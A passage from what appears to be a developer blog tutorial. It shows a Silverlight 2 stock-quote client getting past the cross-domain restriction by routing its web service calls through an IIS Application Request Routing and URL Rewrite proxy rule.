        <ColumnDefinition Width="50" />
        ColumnDefinition Width="*" />
        ColumnDefinition Width="50" />
        <TextBlock Grid.Column="0" Grid.Row="0" Text="Symbol:" />
        TextBox Grid.Column="1" Grid.Row="0" x:Name="_symbolTextBox" />
        Button Grid.Column="2" Grid.Row="0" Content="Go!" Click="Button_Click" />
        ListBox Grid.Column="0" Grid.Row="1" x:Name="_resultsListBox" Grid.ColumnSpan="3"
        <StackPanel Orientation="Horizontal">
        <TextBlock Text="{Binding Path=Name}" FontWeight="Bold" Foreground="DarkBlue" />
        TextBlock Text=" = " />
        TextBlock Text="{Binding Path=Value}" />
      3. Right click the Button_Click text above and select the "Navigate to Event Handler" context menu.
      4. Enter the following code to call the Web Service
      5.     private void Button_Click(object sender, RoutedEventArgs e)
        var service = new StockQuoteService.StockQuoteSoapClient();
        service.GetQuoteCompleted += service_GetQuoteCompleted;
      6. Now, since we are going to use XLINQ to parse the result of the Web Service which is an XML then we need to add the reference to System.Xml.Linq by using the Project->Add Reference->System.Xml.Linq.
      7. Finally, add the following function to handle the result of the Web Service
      8.     void service_GetQuoteCompleted(object sender, StockQuoteService.GetQuoteCompletedEventArgs e)
        var el = System.Xml.Linq.XElement.Parse(e.Result);
        _resultsListBox.DataContext = el.Element("Stock").Elements();
    5. Compile the application. Build->Build Solution.
    6. At this point we are ready to test our application, to run it just navigate to http://localhost/SampleClientTestPage.html or simply select the SampleClientTestPage.html in the Solution Explorer and click View In Browser.
    7. Enter a Stock Symbol (say MSFT) and press Go!, Verify that it breaks. You will see a small "Error in page" with a Warning icon in the status bar. If you click that and select show details you will get a dialog with the following message:
    8. Message: Unhandled Error in Silverlight 2 Application An exception occurred during the operation, making the result invalid. 

    Enter Application Request Routing and IIS 7.0

    1. Ok, so now we are running into the cross-domain issue, and unfortunately we don't have a cross-domain here is where ARR can help us call the service without writing more code
    2. Modify the Web Service configuration to call a local Web Service instead
      1. Back in Visual Web Developer, open the file ServiceReferences.ClientConfig
      2. Modify the address="" to be instead address="http://localhost/stockquote.asmx", it should look like:
      3.     <client>
        <endpoint address="http://localhost/stockquote.asmx"
        ="basicHttpBinding" bindingConfiguration="StockQuoteSoap"
        ="StockQuoteService.StockQuoteSoap" name="StockQuoteSoap" />
    3. This will cause the client to call the Web Service in the same originating server, now we can configure ARR/URL Rewrite rule to route the Web Service requests to the original end-point
      1. Add a new Web.config to the http://localhost project (Add new item->Web.config)
      2. Add the following content:
      3. <?xml version="1.0" encoding="UTF-8"?>
        <rule name="Stock Quote Forward" stopProcessing="true">
        <match url="^stockquote.asmx$" />
        action type="Rewrite" url="" />
    4. This rule basically uses regular expression to match the requests for StockQuote.asmx and forwards them to the real Web Service.
    5. Compile everything by running Build->Rebuild Solution
    6. Back in your browser refresh the page to get the new, enter MSFT in the symbol and press Go!
    7. And Voila!!! everything works.


    One of the features offered by ARR is to provide proxy functionality to forward requests to another server. One of the scenarios where this functionality is useful is when using it from clients that cannot make calls directly to the real data, this includes Silverlight, Flash and AJAX applications. As shown in this blog, by just using a few lines of XML configuration you can enable clients to call services in other domains without having to write hundreds of lines of code for each method. It also means that I get the original data and that if the WSDL were to change I do not need to update any wrappers. Additionally if using REST based services you could use local caching in your server relying on Output Cache and increase the performance of your applications significantly (again with no code changes).

    Software used

    Here is the software I installed to do this sample(amazing that all of it is completely free):

    1. Install Visual Web Developer 2008 Express
    2. Install Silverlight Tools for Visual Studio 2008 SP 1
    3. Install Application Request Routing for IIS 7.
Page 4 of 10 (94 items) «23456»